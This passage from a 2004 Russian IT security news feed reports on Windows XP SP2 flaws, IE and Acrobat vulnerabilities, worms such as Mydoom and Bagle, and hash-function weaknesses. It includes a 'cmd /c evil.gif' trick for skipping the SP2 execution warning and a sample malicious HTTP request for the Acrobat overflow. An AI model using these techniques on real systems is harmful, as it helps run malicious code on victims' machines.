«спамирующих» веб-сайтов хостится за рубежом, так как многие британские ISP уже закрыли такие веб-сайты в соответствии со своими собственными правилами обслуживания. Успех новой инициативы зависит от того, сможет ли LINX убедить зарубежных ISP ужесточить правила, отметил Хатти. Он надеется, что соответствующие меры будут приняты организацией RIPE, устанавливающей правила поведения в интернете для более чем 90 стран Европы, Ближнего Востока, Центральной Азии и Африки. От себя хотелось бы добавить, что очень бы хотелось, чтобы подобную инициативу поддержал и дорогой и горячо любимый RU-CENTER, который отвечает за выдачу и поддержание доменов в зоне .RU. Например, не мешало бы прекратить делегирование www.goldfirms.ru, от имени которого идёт большая доля рассылки русскоязычного спама.
ZDNet

19/08/2004 16:15 Безграмотные программисты Microsoft опозорили никарагуанских женщин
Программисты, которые плохо знают географию, принесли корпорации Microsoft сотни миллионов долларов убытков, сообщается на сайте газеты Guardian. Кроме прямых убытков, необразованные программисты снизили так называемый "рейтинг доверия" клиентов. Об этом рассказал на Международной конференции географов в Глазго высокопоставленный представитель корпорации Том Эдвардз (Tom Edwards). В настоящее время Microsoft организовала курсы ликвидации географической безграмотности среди своих сотрудников. Как отметил Эдвардз, подобные проблемы Microsoft вполне отражают ситуацию с географической грамотностью у американцев в целом. По его словам, согласно статистике, почти половина американских подростков с трудом может сказать, где находится Тихий океан.
- На карте часовых поясов в установках Windows 95 индийский штат Джамму и Кашмир был размещен за пределами территории страны. В результате из-за нареканий со стороны индийских властей корпорация была вынуждена переделать соответствующий раздел операционной системы.
- В испаноязычной версии Windows для определения пола было задействовано слово Hembra. В переводе с испанского оно означает "женщина", но в ряде латиноамериканских стран (например, в Никарагуа) оно имеет нецензурное значение. Корпорации пришлось изымать из продажи тысячи копий программы и переписывать ее.
Более подробно

19/08/2004 16:02 Тенденции развития вредоносных программ, июль 2004
"Лаборатория Касперского" опубликовала материал под таким названием. Главным событием прошлого месяца стало появление 17 июля первого вируса, заражающего файлы карманных компьютеров. Хотя данный вирус сам по себе опасности для пользователей КПК не представляет, видно что уже не за горами появление действительно опасных вирусов для КПК, способных не только нарушать работоспособность устройств, но и приводить к утечкам конфиденциальной информации. Значительным событием стал I-Worm.Mydoom.m. который впервые использовал популярные поисковые системы - Google, AltaVista, Lycos и Yahoo! - для сбора почтовых адресов, на которые впоследствии будет производиться рассылка зараженных писем, когда предыдущие версии червя ограничивались информацией, находящейся на зараженном компьютере. Теперь любителям общаться в интернете, беспечно указывающим свои почтовые адреса на публичных ресурсах, грозит не один лишь спам. Стоит также отметить появление червя I-Worm.Bagle.aa, помимо исполнительного файла, распространявшего еще и собственные исходные коды. Что же касается обычных файловых вирусов, было зафиксировано значительное увеличение так называемых сэндвичей, т. е. почтовых червей, тело которых заражено обычным файловым вирусом. В качестве вывода отмечается, что все большее опасение вызывает текущий тенденция развития почтовых червей, которые стали представлять огромную опасность для конфиденциальности информации пользователей и работоспособности практически любой сети.
viruslist.ru

19/08/2004 16:02 ALT Linux будет распространяться под маркой "1С:Дистрибьюция"
Компании ALT Linux и «1С» заключили соглашение об издании сборника приложений под торговой маркой «1С:Дистрибьюция». Будут выпущены пакет программ «Свободный офис» и серверное решение ALT Linux 2.3 SOHO Server. В рамках проекта предусмотрен выпуск двух вариантов поставки «Свободного офиса» - одно- и двухдисковый вариант. Однодисковый вариант поставки включает два русифицированных программных пакета — OpenOffice.org и Mozilla для операционных систем Windows и Linux, программу установки, среду исполнения Java, Adobe Acrobat Reader 5.0 и руководство пользователя в формате pdf. «Свободный офис. 2.0 Профессиональная версия» — поставляется на двух дисках и отличается расширенным составом программного обеспечения и наличием документации. В комплект входят также словари и шаблоны, СУБД MySQL, веб-браузер и почтовый клиент Mozilla, дополнительные модули для Mozilla, GIMP, Audacity, набор clipart, исходные тексты и электронная документация. ALT Linux 2.3 SOHO Server поставляется в коробке и включает один CD, печатную документацию и купон на техническую поддержку. В состав ALT Linux 2.3 SOHO Server включены веб-сервер (apache), прокси-сервер (squid), почтовый сервер (postfix), сервер доступа к почтовым ящикам (popa3d), файловый север (samba) и DNS-сервер (bind).
cnews.ru

19/08/2004 15:59 Впервые в России видеопират получил реальный срок заключения
Житель Ростова-на-Дону Александр Щербаков приговорен к трем годам и двум месяцам лишения свободы за видеопиратство. Такой вердикт вынес в среду Ленинский районный суд Ростова, передает "Интерфакс". Это первый случай в России, когда за подобное нарушение виновный получил реальный, а не условный срок заключения. Осужденный был взят под стражу в зале суда сразу после оглашения приговора. Два подельника Щербакова получили по году условно. Следствием установлено, что Щербаков у себя на квартире незаконно тиражировал DVD-диски. Кроме того, он имел две торговые точки, на которых продавал пиратские копии. "Приговор Щербакову - это не только торжество справедливости. Это в какой-то мере и начало массированной атаки на пиратов", - заявил в интервью "Ленте.Ру" директор Российской антипиратской организации (РАПО) Константин Земченков. "В нашем распоряжении появилась измененная статья 146, часть 3 УК РФ от апреля 2003 года, согласно которой, чтобы осудить пирата, не нужно доказывать крупный ущерб правообладателей-членов нашей ассоциации", - сообщил Земченков.Он сообщил, что ежегодно суды выносят в среднем по сто приговоров, но всем пиратам дают условный срок. "Поэтому мы хотим выразить благодарность судье из Ростова-на-Дону за то, что создан первый прецедент", - заявил директор РАПО.
lenta.ru

19/08/2004 15:58 Уязвимость в Internet Explorer
Secunia сообщает, http-equiv обнаружила уязвимость в Microsoft Internet Explorer. Степень опасности - критичная (Highly critical). Уязвимы Microsoft Internet Explorer версий 5.01,5.5, 6. Уязвимость возникает из-за неправильной обработки события "drag and drop" вызванного из зоны безопасности "Internet" в локальную зону. Уязвимость может быть задействована злоумышленниками с удаленного веб сайта например для того, чтобы поместить таким образом выполняемый файл в папку автозапуска на машине пользователя, что приведет к запуску вредоносного кода при следующей загрузке Windows. http-equiv в качестве доказательства предоставила пример помещающий программу в автозапуск в тот момент, когда пользователь перемещает программу, замаскированную под картинку. Сообщается, что таким образом теоретически можно переопределить не только "drag and drop" событие, но и, например, mouse click. Вариант этой уязвимости обнаружил также Liu Die Yu. Уязвимость подтверждена на полностью пропатченной системе с Internet Explorer 6.0 и Microsoft Windows XP SP1/SP2.
secunia.com

18/08/2004 15:06 Windows XP Service Pack 2 и дыры которые он патчит
The Inquirer сообщает, Microsoft опубликовала документ описывающий какие именно уязвимости и ошибки исправляет выпущенный недавно "мегапатч" Windows XP Service Pack 2. Согласно этому документу, SP2 содержит более 150 исправлений и обновлений. Подробнее моно прочитать на сайте Microsoft. Большинство исправлений касаются аспектов работы с сетью. Всего в патче 138 исправлений касаются самой операционной системы. Около сотни перечислены как "security fixes". SP2 исправляет проблемы в Internet Explorer, shell, Outlook Express, multimedia, COM+, IIS, MDAC, Media Centre edition, Remote Desktop, RPC, setup, video, и Windows Management Instrumentation. The Inquirer иронизирует по этому поводу. "Неплохо!, для системы которая в момент выхода преподносилась маркетологами как самая защищенная операционная система", пишет Inquirer.
microsoft.com
theinquirer.net

18/08/2004 12:54 Для чего нужен SPF?
«Вебпланета» публикует коллективную работу Ильи Сегаловича, Елены Колмановской и Павла Завьялова, в которой излагается отношение «Яндекса» к технологии SPF (Sender Policy Framework) и ее месту в современных антиспамовых системах, а так же комментируются некоторые распространенные заблуждения.
О технологии SPF

18/08/2004 12:30 CA обзавелась технологией блокировки spyware
Computer Associates International приобрела компанию PestPatrol, разработчика системы блокирования "шпионского" кода (spyware) - файлов cookie и других методик сбора информации о пользователе. Продукты PestPatrol будут включены в пакет CA eTrust Threat Management, в составе которого имеются также антивирус, система защиты от спама и механизм фильтрации содержания Internet. По словам представителя СА, компания на достаточно долго выбирала поставщика системы блокирования spyware, с которым можно было бы заключить партнерский договор или сделку на приобретение. И именно PestPatrol лучше других подошел СА с точки зрения функциональности. Служба PestPatrol Center for Pest Research, предоставляющая бесплатные консультации по предотвращению заражений и удалению вредного кода, будет интегрирована в службу СА Security Advisor.
"Открытые системы"

18/08/2004 12:06 Троян Bancos ворует банковскую информацию
Компания Symantec зафиксировала появление новой вредоносной программы Bancos. После проникновения на компьютер с операционной системой Windows этот троян модифицирует реестр, закрывает некоторые антивирусные приложения и начинает осуществлять мониторинг интернет-активности. В случае, если владелец инфицированной машины пытается зайти на сайты бразильских банков Banco Real и Banespa, вредоносная программа выводит на дисплей фальшивое диалоговое окно, пытаясь похитить конфиденциальную информацию о пользовательских аккаунтах. Широкого распространения троян Bancos пока не получил.
Описание

18/08/2004 11:29 Первая уязвимость в SP2?
Похоже, различные неприятности, связанные с появлением долгожданного SP2 продолжаются. Юрген Шмидт из немецкой компании heise Security сообщает об обнаружении уязвимости механизма безопасности, применяемого во втором сервис-паке. Как пишет сам автор, в SP2 введён механизм защиты, предупреждающий пользователей при попытке выполнения файла, скачанного из небезопасной зоны, которой, несомненно, является Интернет. Для обеспечения этого механизма, IE и Outlook Expres помечают файлы, скачанные из Интернета или сохранённые из E-mail специальным идентификатором, называющимся ZoneID, значение которого указывает на источник, откуда был взят файл. Эта информация сохраняется в специальном поле, носящем название Additional Data Stream (ADS) файла. Это поле является особенностью файловой системы NTFS. В случае, если источник файла - Интернет, ZoneID=3. Соответственно, в случае попытки выполнения подобного файла, будет выдано предупреждение. Однако, как заметил Юрген, подобную реакцию можно обойти, если запустить файл через командную оболочку cmd (пример: cmd /c evil.exe). Файл будет выполнен без предупреждения. Более того, если подобный файл переименовать и дать название, например, evil.gif, при вызове команды cmd /c evil.gif он будет выполнен именно, как выполнимый файл, а не как графический (подобное поведение cmd есть в любой версии WinXP). Вторая подобная уязвимость связана с механизмом кеширования ZoneID браузером Internet Explorer. Если файл был сохранён из безопасного места, а потом переписать вместо этого файла файл из Internet (copy, например), файл будет выполнен без всякого предупреждения. Подобные уязвимости представляют большой интерес для вирусописателей и распространителей троянов. В подобной ситуации странна реакция M$, которая в ответном письме автору пишет, что не считает подобную "особенность" противоречащей политике безопасности WinXP SP2.
Описание уязвимостей

18/08/2004 11:15 Обнаружены уязвимости многих криптографических алгоритмов
Мир криптографии взбудоражен новостями о том, что в математических функциях, на которых построены широко используемые приложения защиты информации, обнаружены неизвестные ранее слабые места. Французский специалист Антуан Жу обнаружил слабину в популярном алгоритме MD5, который часто применяется для цифровых подписей. Затем четверо китайских ученых выпустили документ, в котором предлагают способ обойти еще один алгоритм, SHA-0. Хотя их результаты предварительны, со временем эти открытия могут облегчить злоумышленникам введение необнаруживаемых лазеек в компьютерный код или подделку электронных подписей — если не будет применяться другой, более надежный алгоритм. Третье сообщение, которое еще больше накалило обстановку, прозвучало во вторник вечером на конференции Crypto 2004 в Санта-Барбаре. Там же были представлены и другие документы. Ученые из Израильского технологического института Эли Бихам и Рафи Чен первоначально планировали представить работу о способах взлома алгоритма Secure Hash Algorithm (SHA-0), несовершенство которого общеизвестно. Однако в своем докладе Бихам привел некоторые ранние результаты работы, выявляющей уязвимости и в алгоритме SHA-1, считавшимся надежным. Доклад носил очень предварительный характер, но он может поставить под вопрос долгосрочное будущее широко применяемого алгоритма SHA-1 и заставить специалистов искать альтернативы. Ниже представлена ссылка на документ в формате PDF, описывающий подобные уязвимости.
PDF-файл

18/08/2004 10:44 Срок жизни непропатченного ПК — 20 минут
Не подключайте новый ПК к интернету, не приняв необходимых мер предосторожности, предупреждают эксперты Internet Storm Center. Согласно опубликованному во вторник отчету, непропатченный Windows-ПК, подсоединенный к интернету, в среднем уже через 20 минут будет поражен злонамеренными программами. В 2003 году эта цифра, по оценкам группы, составляла примерно 40 минут. Центр Internet Storm Center, отделение SANS Institute, специализирующееся на исследованиях и обучении, пришел к выводу о 20-минутном «времени выживания», наблюдая за свободными IP-адресами и измеряя частоту поступающих на них сообщений. «Если предположить, что большинство этих сообщений генерируется червями, которые пытаются распространяться, то система без установленных исправлений неизбежно будет инфицирована», — говорится в заявлении центра. Сокращение среднего времени выживания с 40 до 20 минут вызывает беспокойство, так как этого времени недостаточно для загрузки самих патчей, которые защитили бы ПК от интернет-угроз. Скотт Конти, менеджер по эксплуатации сетей в Массачусетсском университете в Амхерсте, считает данные центра правдоподобными. «Это сложная проблема, и решить ее становится все труднее», — сказал он. Один из администраторов Конти недавно проверил эти данные, подключив к сети два непропатченных компьютера. Через 20 минут оба они были заражены. Теперь университет проверяет состояние компьютеров, прежде чем подсоединить их к интернету. Если в машине не установлены последние исправления, она ставится на карантин с ограниченным доступом к сети до тех пор, пока ПО не будет обновлено. В руководстве по исправлению новой Windows-системы Internet Storm Center рекомендует отключить функцию file sharing Windows и включить Internet Connection Firewall. Последний сервисный пакет Microsoft, Windows XP Service Pack 2, сам установит такую конфигурацию, но чтобы скачать его, пользователю надо выйти в онлайн, так что он вынужден рисковать.
Руководство ISC

18/08/2004 10:06 Microsoft откладывает появление версии SP2 для автоматического обновления
Компания Microsoft несколько изменила расписание выпуска второго сервис-пака для операционной системы Windows XP. Напомним, что этот пакет обновлений был выпущен в свет 6 августа, а полная версия была выложена для загрузки была выложена на сайте Microsoft 9 августа. Однако скачивать ее рекомендуется только системным администраторам и профессионалам, которым нужно установить сервис-пак на несколько компьютеров. Индивидуальным пользователям рекомендуется включить службу автоматических обновлений и ждать, когда сервис-пак загрузится через нее. В этом случае загружаться будут только нужные компоненты, а не все 266 Мб дистрибутива. Однако такой способ распространения сервис-пака не слишком подходит корпоративным клиентам. Если на компьютер каждого пользователя сервис-пак будет загружаться автоматически, то объем сетевого трафика превысит все разумные пределы. Чтобы компании могли избежать этого, в Microsoft выпустили специальные средства, блокирующие загрузку сервис-пака. А через некоторое время в компании решили и скорректировать график выхода сервис-пака, с тем чтобы корпоративные пользователи успели заблокировать его автоматическую установку. Если ранее планировалось запустить сервис-пак в систему автоматических обновлений 16 августа, то в соответствии с новым расписанием, опубликованным на сайте Bink.nu, это произойдет только 18 числа, причем автоматическая загрузка сервис-пака будет работать только для пользователей Windows XP Home Edition. 16 августа обновление появится только в системе Software Update Services, позволяющей организовать централизованную установку обновлений в корпоративной сети. Для пользователей Windows XP Professional сервис-пак начнет распространяться в качестве автоматического обновления начиная с 25 августа - одновременно с появлением сервис-пака в онлайновой службе Windows Update.
График выхода

18/08/2004 09:54 Уязвимость в CVS.
Secunia сообщила об обнаруженной некритичной ("Not critical") уязвимости в Concurrent Versions System (CVS), которая может дать возможность злоумышленнику получить некоторую информацию о системе. Проблема возникает из-за недокументированного ключа "-X" в команде "history", реализация которой находится в "src/history.c". Используя этот ключ и подставляя произвольное имя файла, CVS пытается открыть заданный файл и возвращает различную информацию, в зависимости от того существует данный файл и доступен ли он. Это поведение может быть использовано для получения информации о существовании и атрибутах произвольных файлов и дерикторий на уязвимой системе. Уязвимость подтверждена в версии 1.11, более ранние версии также могут быть уязвимы. Уязвимость исправлена в версиях 1.11.17 и 1.12.9.
Подробности

17/08/2004 12:21 Уязвимость в Adobe Acrobat Reader
По сообщению "Компьюленты", в одном из компонентов Adobe Acrobat Reader обнаружена критическая уязвимость. Как сообщает компания iDefense, проблема связана с неправильной работой функции RTLHeapFree(). Для реализации атаки злоумышленнику необходимо заставить жертву открыть файл в формате PDF, в состав которого внедрена специальная HTTP-ссылка. Обработка такого файла приведет к возникновению ошибки переполнения буфера и последующему выполнению на удаленном компьютере произвольного программного кода. Примером вредоносного запроса может служить строка "GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1". В компании Adobe попытались устранить уязвимость в Acrobat Reader версии 6.02, однако, согласно утверждениям специалистов iDefense, проблема так и не была решена полностью.

17/08/2004 12:06 Установка XP SP2 тормозит компьютеры
Похоже, всё большее количество людей, отважившихся на установку долгоожидаемого SP2 для ОС Windows XP, испытывают разнообразные проблемы. Так, Модератор форума на сайте компании RME заявил, что установка Windows XP SP2 может привести к уменьшению скорости передачи данных через порт Firewire с 800 до 100 Мбит/с. По словам модератора RME Маттиаса Карстенса (Matthias Carstens), данная проблема касается любого устройства с Firewire 800, включая PCI-шины и жесткие диски. Разработчики последней версии Microsoft XP нарушили все существующие стандарты и выпустили недоработанный продукт, несовместимый с Firewire 800. По словам г-на Карстенса, многие фирмы пытаются покупать и устанавливать драйвера Firewire 800, однако они не работают корректно. Однако, если после обновления SP2 установить старые драйвера SP1 Firewire, то система заработает. Руководство RME собирается издать подробное руководство по данному вопросу.
CNews

17/08/2004 11:43 Стандарт адресации Web-служб
Компании BEA, IBM, Microsoft, SAP и Sun передали спецификацию WS-Addressing консорциуму W3C на рассмотрение в качестве будущего стандарта, свободного для применения. Спецификация определяет форматы адресной части технических заголовков сообщений и ссылок на конечные точки Web-служб. WS-Asdressing задумана в качестве основы, на которую будет полагаться ряд других спецификаций, типа WS-ReliableMessaging и WS-Federation, и рассматривается как ключевой компонент стека стандартов, реализующих главную функцию Web-служб - обмен данными между разнородными приложениями. Sun - новичок в списке сторонников WS-Addressing. Sun, Oracle, Nokia и ряд других компаний в апреле подали на рассмотрение W3C свой вариант стандарта адресации, WS-MessageDelivery. Sun перешла в стан сторонников WS-Addressing после заключения "мирного договора" с Microsoft и теперь планирует включить в состав объединенной спецификации некоторые наработки, созданные для WS-MessageDelivery.
"Открытые системы"

17/08/2004 11:02 Уязвимость в Internet Explorer
Secunia сообщает об очередной дыре в браузере Internet Explorer последних версий. Уязвимость, охарактеризованная как умеренно критическая, может использоваться злоумышленниками для осуществления так называемых фишинг-атак на удаленные системы. Данный вид мошенничества, напомним, подразумевает подмену URL в адресной строке браузера. В результате, пользователь, находящийся на подставном сайте, будет думать, что посетил страницу какого-либо солидного ресурса, например, банка. Подобная схема может применяться для кражи номеров кредитных карт, паролей и пр. Дыра присутствует в браузере IE версий 5.01, 5.5 и 6.0. Уязвимость обнаружена известным исследователем безопасности браузера Лю Ди Ю. В качестве меры противодействия предлагается отключить поддержку активного скриптинга, либо, что стало довольно стандартным советом в последнее время - использовать альтернативный браузер.
Описание уязвимости

17/08/2004 10:04 Выход Crypto-Gram
Вышел очередной, августовский номер электронного журнала, посвящённого криптографии и компьютерной безопасности Crypto-Gram. Журрнал выпускается под руководством Брюса Шнайера, CTO и основателя компании Counterpane Internet Security, Inc. В номере: BOB on Board, Crypto-Gram, Reprints, Alibis and the Kindness of Strangers, News, Security Notes from All Over: GHB, Counterpane News, Houston Airport Rangers, Websites, Passwords, and Consumers.
Августовский номер

17/08/2004 09:37 Хостинг-провайдер Arbatek (Москва) начинает предоставлять Windows-хостинг
С 9 августа 2004 года любой желающий может получить в свое распоряжение виртуальный сервер на платформе Windows по ценам от $12, сообщается на сайте "Независимого обзора провайдеров". Компания Arbatek в рамках тарифной сетки «.NET» предоставляет своим клиентам виртуальный сервер на платформе Windows Server 2003 с дисковым пространством от 250 Mb. Трафик, количество почтовых ящиков и субдоменов не ограниченно. Хостинг на базе Windows 2003 от компании Arbatek позволяет использовать технологии .NET, ASP, ColdFusion, Tomcat, Perl, PHP и многие другие. В качестве баз данных могут быть использованы: MSSQL, MySQL, Access. Для размещения клиентских аккаунтов используются мощные индустриальные серверные платформы (Xeon 2.8 GHz x 2, RAID-5, минимум 6 Gb RAM). Оборудование размещается в профессиональном датацентре M10 в Москве и находится под круглосуточным наблюдением персонала компании.
Подробности

16/08/2004 20:58 Второй сервис-пак для Windows XP: личный опыт
Возвращаясь к теме SP2, хотелось бы обратить внимание посетителей сайта на статью Ивана Карташова на сайте "Компьютерра-онлайн", в которой автор делится впечатлениями о работе системы после установки SP2. Обращает на себя внимание то, что всё-таки проверка ключей на наличие пиратской версии выполняется. Также хотелось бы напомнить, что русская версия SP2 ожидается в сентябре.
Cтатья

16/08/2004 20:19 Опубликован список программ, несовместимых с сервис-паком для Windows XP
Компания Microsoft опубликовала новую информацию, касающуюся второго сервис-пака к операционной системе Windows XP. В очередной статье базы знаний Microsoft рассказывается, что делать c программами, которые перестают нормально работать после установки пакета обновлений. В Microsoft отмечают, что большинство проблем возникают из-за блокировки брандмауэром сетевых соединений. В результате, некоторые функции приложений оказываются недоступными. В большинстве случаев, для того чтобы приложение могло обмениваться данными по сети, достаточно разрешить ему это, выбрав опцию Unblock в диалоговом окне брандмауэра, которое появляется при попытке "незнакомой" программы выйти в интернет. Например, для интернет-пейджера Miranda этого оказалось вполне достаточно. К альтернативными браузерам Opera и Mozilla у сервис-пака претензий вообще нет. Однако в некоторых случаях автоматическая настройка не помогает, и необходимо вручную открывать необходимые для работы приложения порты. При этом возможны кое-какие затруднения, и Microsoft рассказывает, как их разрешить. Самое сложное - выяснить, какой диапазон портов используется программой. Затем нужно войти в пункт настройки брандмауэра и указать эти порты в качестве разрешенных. Перечень программ, порты для которых необходимо открывать, достаточно обширен. В него входят, например, FTP-клиент CuteFTP 5.0, среда разработки Visual Studio .NET (дополнительные настройки требуются при использовании удаленной отладки), Symantec AntiVirus Corporate Edition 8.0 и 9.0 и многие другие программы, в том числе некоторые игры, включая Need for Speed Hot Pursuit 2 и Unreal Tournament 2003.
Подробности от Microsoft

16/08/2004 20:06 Windows легче «овладеть»?
Microsoft долго ждала, пока секьюрити-эксперты подтвердят, что у операционной системы Windows низкая стоимость владения. Наконец, дождалась — но вряд ли это можно считать хорошей новостью. В пятницу Дэвид Эйтель, известный специалист в области компьютерной безопасности и управляющий директор фирмы Immunity, занимающейся оценкой уязвимостей, опубликовал статью, в которой утверждает, что «овладение» компьютером — что на языке хакеров означает взлом системы — упрощается, если целевая машина работает под Windows. Хотя отчет пестрит каламбурами и остротами, это серьезное сопоставление степени безопасности Windows и Linux, утверждает Эйтель. «Мы немного повеселились, но данные, лежащие в основе анализа, и его выводы вполне достоверны», — сказал он. Документ, озаглавленный «Microsoft Windows: A lower Total Cost of 0wnership», пародирует другие, как правило, заказанные Microsoft исследования, такие как отчет IDC, в котором утверждается, что в четырех из пяти корпоративных приложений внедрение Windows обходится дешевле. В другом подобном отчете, опубликованном Forrester, делается заключение, что у Linux некоторые параметры безопасности хуже, чем у Windows — однако данные, использованные в этом исследовании, многими ставятся под сомнение. Документ Эйтеля — первый случай, когда по данному вопросу высказывается секьюрити-профессионал с практическим хакерским опытом в области обеих систем Linux и Windows. Его вывод: несмотря на два года работы Microsoft над повышением уровня безопасности своей операционной системы в рамках инициативы Trustworthy Computing, защиту Windows-компьютеров преодолеть легче, чем современных Linux-компьютеров. Microsoft отказалась комментировать этот документ. Однако в отчете очень мало подтверждающих данных, что делает его не таким уж грозным вызовом для Microsoft, а, скорее, просто еще одним голосом в бесконечном споре между двумя лагерями приверженцев операционных систем. Опираясь на свои экспериментальные данные, исследователи Immunity находят, что среднее время поиска ими ошибки в дистрибутиве Linux Red Hat Fedora Core 2 составляет примерно шесть дней — вдвое дольше, чем среднее время выявления ранее неизвестных уязвимостей Windows. По их наблюдениям, на это время влияет несколько факторов, в том числе лучшие инструменты для поиска ошибок в Windows-системах, лучшая защита Linux на уровне ядра и больше известных точек исполнения атакующего кода в Windows.
Подробнее

16/08/2004 19:33 Обнаружены две дыры в Adobe Acrobat Reader
В пакете Adobe Acrobat Reader обнаружены две опасные уязвимости, cообщает "Компьюлента". Ошибки, содержащиеся в модуле uudecoding, могут приводить к выполнению на удаленном компьютере произвольного вредоносного кода. Для реализации атаки злоумышленникам необходимо заставить пользователя открыть файл в формате PDF (Portable Document Format) с составленным определенным образом именем. Дыры присутствуют в пакетах Adobe Acrobat Reader версий 5.05 и 5.06 для операционной системы Unix. Устранить проблему можно путем инсталляции обновленной модификации программы, получившей индекс 5.09.
Secunia

16/08/2004 19:18 Шеф американского интернет-агентства отказался признать себя хакером
Шеф американского рекламного интернет-агентства Snipermail.com Скотт Левин (Scott Levine) на первом заседании суда отказался признать себя виновным в хищении электронных почтовых адресов с сервера компании Acxiom. Обвинительное заключение против Левина включает 144 пункта. Следующее судебное слушание по делу 45-летнего жителя города Бока Ратон назначено на 27 сентября. До этого момента Левин будет находиться на свободе под залог в 25 тысяч долларов. В случае, если обвиняемый будет точно выполнять все требования суда, деньги будут ему возвращены, отмечает газета Arkansas Democrat. Сам Левин отказался комментировать ход своего дела. Обвинения в незаконном доступе к защищенной информации и отмывании денег были предъявлены ему 21 июля. По информации обвинения, сотрудники агентства Snipermail.com незаконно использовали информацию Acxiom с апреля 2002 года. Шесть сотрудников, которым не были предъявлены обвинения, согласились сотрудничать с судом во время рассмотрения дела Левина. Среди сведений, похищенных Левиным, были и номера банковских карт. Однако никаких свидетельств того, что он использовал их для совершения преступлений, нет.
Подробности

16/08/2004 18:59 Трафик "Стрима" больше не сгорает
Пресс-служба компании «МТУ-Интел» сообщила о том, что теперь абоненты сервиса «Стрим» не будут терять предоплаченный трафик. Весь неизрасходованный трафик будет автоматически переноситься на следующий месяц. Для предоставления данной услуги была перенастроена биллинговая система и отлажена схема переноса трафика.
www.mtu-intel.ru

16/08/2004 18:45 I-Worm.Mydoom.q распространяется по сети
Новый вариант почтового червя I-Worm.Mydoom начал активно распространяеться по сети с 16 августа. Сразу несколько фирм - разработчиков антивирусов объявили о его появлении. Среди них TREND MICRO, NETWORK ASSOCIATES, PANDA ANTIVIRUS, F-SECURE, SYMANTEC, COMPUTER ASSOCIATES и "Лаборатория Касперского". Секьюрити-компания Secunia выпустила бюллетень с предупреждением об опасности средней (MEDIUM) степени. Червь имеет несколько псевдонимов, среди них: Coco.A, I-Worm.Farex.a, I-Worm.Mydoom.q,
I-Worm.Win32.Ratos, Mydoom.R, MyDoom.S, WORM_RATOS.A и др. Червь распространяется через интернет в виде вложений в зараженные электронные письма. Червь написан на языке Microsoft Visual C++. Упакован UPX. Размер в упакованном виде - 27136 байт, в распакованном - 65024 байта. Червь запускается только в случае запуска пользователем вложения из полученного зараженного письма. После своего запуска червь копирует себя в каталог Windows под именем "rasor38a.dll", в системный каталог Windows под именем "winpsd.exe" и регистрируется в ключе автозапуска системного реестра. Зараженное червем письмо имеет следующие характеристики: Заголовок письма - "photos"; Текст письма - "LOL!;))))"; Имя вложения - "photos_arc.exe". Червь пытается загрузить на зараженный компьютер программу удаленного администрирования Backdoor.Win32.Surila.g. В случае успешной загрузки, файл сохраняется в каталоге Windows под именем "winvpn32.exe" и запускается.
secunia.com

16/08/2004 18:29 Недельный отчет о вирусах от Panda Software
Panda Software опубликовала очередной отчет, посвященный событиям прошедшей недели. Он посвящен версии AM Bagle и троянцам: Leritand.A, Leritand.B и Leritand.C, а также Toquimos.A. Bagle.AM появился в начале недели и очень быстро заразил большое количество компьютеров. Он распространяется по электронной почте в сообщении без темы, содержащем вложение с изменяемым именем и расширением ZIP. Данный файл содержит два объекта: Illwill.A, HTML файл, позволяющий при помощи использования бреши заражать компьютеры без ведома пользователя и EXE файл, открывающий при запуске файл Illwill.A. После заражения компьютера Bagle.AM пытается загрузить ложный JPG файл с различных веб сайтов. В случае загрузки начинается распространение червя. Более того, Bagle.AM также распространяется через программы обмена файлами P2P. Leritand.A, Leritand.B и Leritand.C являются троянцами, изменяющими префикс веб адресов, начинающихся с www, что приводит к перенаправлению соединения на веб сайт, который уже и открывает страницу, запрошенную пользователем. Кроме того, этот вредоносный код отключает обработчики URL протоколов its, ms-its и mhtml, не позволяя функционировать некоторым системам помощи. Leritand.A, Leritand.B и Leritand.C изменяют адрес домашней страницы в Internet Explorer и добавляют ссылки в папку Избранное. Завершает отчет описание Toquimos.A, троянца, заражающего сотовые телефоны Nokia 60 серии. Он не способен распространяться самостоятельно, а должен быть установлен пользователем. Основным средством распространения являются сети обмена файлами P2P. После запуска Toquimos.A проверяет, установлены ли на телефоне пиратские версии игр. Если да, то он отправляет SMS на платный номер без ведома пользователя.
viruslab.ru

15/08/2004 13:52 Thor Larholm cообщает о методе блокирования уязвимости AIM
После появления сообщения об уязвимости в AIM (AOL Instant Messenger) появилась рекомендация, в которой предлагалось удалить ключ реестра "HKEY_CLASSES_ROOT\aim" для того, чтобы при получении URL вида aim: не запускался AIM. Однако, как указывает Thor Larholm из PivX Solutions подобный метод не защитит полностью от уязвимости, поскольку при запуске AIM подобный ключ реестра будет создан снова. Вместо этого предложен способ внесения значения REG_SZ со значением "{3050F406-98B5-11CF-BB82-00AA00BDCE0B}" в ветку [HKEY_CLASSES_ROOT\PROTOCOLS\Handler\aim]. Это предотвратит разбор данных URL вида aim: библиотекой MSHTML.DLL. Thor создал соответствующий .reg-файл, позволяющий автоматизировать этот процесс, и любезно выложил его на своём сайте. Кроме того, как указывает автор, существует опасность вызова потенциально опасных URL (например, вида callto:, ldap: и т.д.). Обнаружить подобные URL-протоколы и отключить можно, включив поиск в реестре значений REG_SZ вида "URL Protocol" в ветви "HKCR\*\URL Protocol". С подобной задачей также справляется разработанная PivX Solutions утилита Qwik-Fix Pro, которую можно скачать с сайта компании.
.reg-файл
Qwik-Fix Pro

15/08/2004 13:37 Команды консоли Windows 2000
На сайте SYSAdmins.RU в подразделе форума с красноречивым названием RTFM выложена довольно любопытная и полезная заметка, которая описывает команды консоли операционной системы Windows 2000.
Статья

15/08/2004 12:14 Вышла спецификация OpenGL 2.0
Компания SGI и комитет OpenGL Architecture Review Board (ARB) представили на проходящей в Лас-Вегасе выставке SIGGRAPH 2004 окончательную спецификацию набора программных интерфейсов для работы с трехмерной графикой OpenGL 2.0. Одним из существенных отличий OpenGL 2.0 стало включение в спецификацию шейдерного языка OpenGL Shading Language. Его собственная спецификация была принята ARB около года назад, однако до сих пор шейдерный язык был расширением, а не неотъемлемым компонентом OpenGL. С помощью OpenGL Shading Language можно создавать как вершинные, так и пиксельные шейдеры, обеспечивая тем самым большую реалистичность изображения. Введение шейдерного языка в спецификацию OpenGL является одним из главных нововведений версии 2.0. Как и более ранние версии, OpenGL 2.0 является кроссплатформенной технологией. Ее можно использовать практически на любых платформах: Linux, Unix, Windows и других. Помимо появления в OpenGL 2.0 шейдерного языка, ряд новых возможностей появился и в программных интерфейсах для работы с трехмерной графикой. В частности, новая версия API позволяет шейдерам одновременно вести запись в несколько буферов вывода. Помимо этого появилась поддержка прямоугольных текстур на любых поверхностях, двусторонние шаблоны (stencils) и 